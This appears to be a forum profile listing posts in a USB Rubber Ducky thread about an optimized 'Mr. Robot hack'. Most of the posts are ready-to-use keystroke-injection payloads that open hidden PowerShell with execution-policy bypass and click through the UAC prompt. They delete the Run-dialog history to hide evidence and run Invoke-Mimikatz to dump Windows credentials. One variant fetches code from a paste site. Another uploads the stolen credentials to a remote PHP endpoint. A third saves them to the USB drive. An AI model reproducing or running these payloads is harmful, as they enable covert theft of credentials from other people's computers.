0x41414141
-
Posts
7 -
Joined
-
Last visited
-
Days Won
1
Posts posted by 0x41414141
-
-
1 hour ago, Bitbot17 said:
do you have a link for the twinduck firmware?
also
doe the last script you wrote also contain the scripts to remove evidense?(powershell, CMD, and run command) because i want to try this out on my own computer
Sure, I recommend you install Git to download all the relevant Rubber Ducky code. Once you've installed Git, simply run the following command to clone everything:
git clone https://github.com/hak5darren/USB-Rubber-Ducky.git
From there, follow the instructions posted @ https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky
The Twin Duck firmware is located in USB-Rubber-Ducky/Firmware/Images/ -- there are several versions but try c_duck_v2.1.hex
Yes, the last script also cleans up the evidence. If you use the script, make sure you download Invoke-Mimikatz.ps1 and copy/rename it on your Twin Duck as im.ps1, you'll also need to modify the drive volume label to read DUCK
-
Here's a version for the Twin Duck. Make sure you leave the ducky plugged in long enough for the creds file to be written in the background.
DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCK"') do @set duck=%d ENTER DELAY 500 STRING if exist %duck%\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';" ENTER -
On 10/25/2016 at 7:44 AM, Us3rnotfound said:
Have the brand new device and the encoder program, that's about it.
In that case you'll need to flash your firmware to a composite edition (i.e. c_duck_v2.1.hex) to function as a Twin Duck (both a USB drive and HID device).
Here is a hybrid script that will work on your current default firmware. It will download the powershell script from a remote web server and save the mimikatz output to the local machine in the %temp% folder.
DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://paste.ee/r/Xopop');Invoke-Mimikatz -DumpCreds|Out-File '%temp%\mimikatz.txt';"&exit ENTERI'll follow up with another version for the Twin Duck firmware.
-
3 hours ago, Us3rnotfound said:
You don't know how to make the script work without a web server by any chance do you? I'd like to get the information to save on the ducky itself.
Do you already have a working version of c_duck_v2.1.hex?
-
I've optimized the Mr. Robot hack to run faster (regardless of web server response times, latency, etc.) and more covertly. Feel free to use the techniques with other payloads.
Once the FE (white/yellow) command prompt closes you can remove the rubber ducky and the script will continue to exfiltrate creds in the background.
DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://example.com/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('https://example.com/rx.php',$o)"&exit ENTER
Mr. Robot Hack (optimized payload)
in Classic USB Rubber Ducky
Posted
Here you go.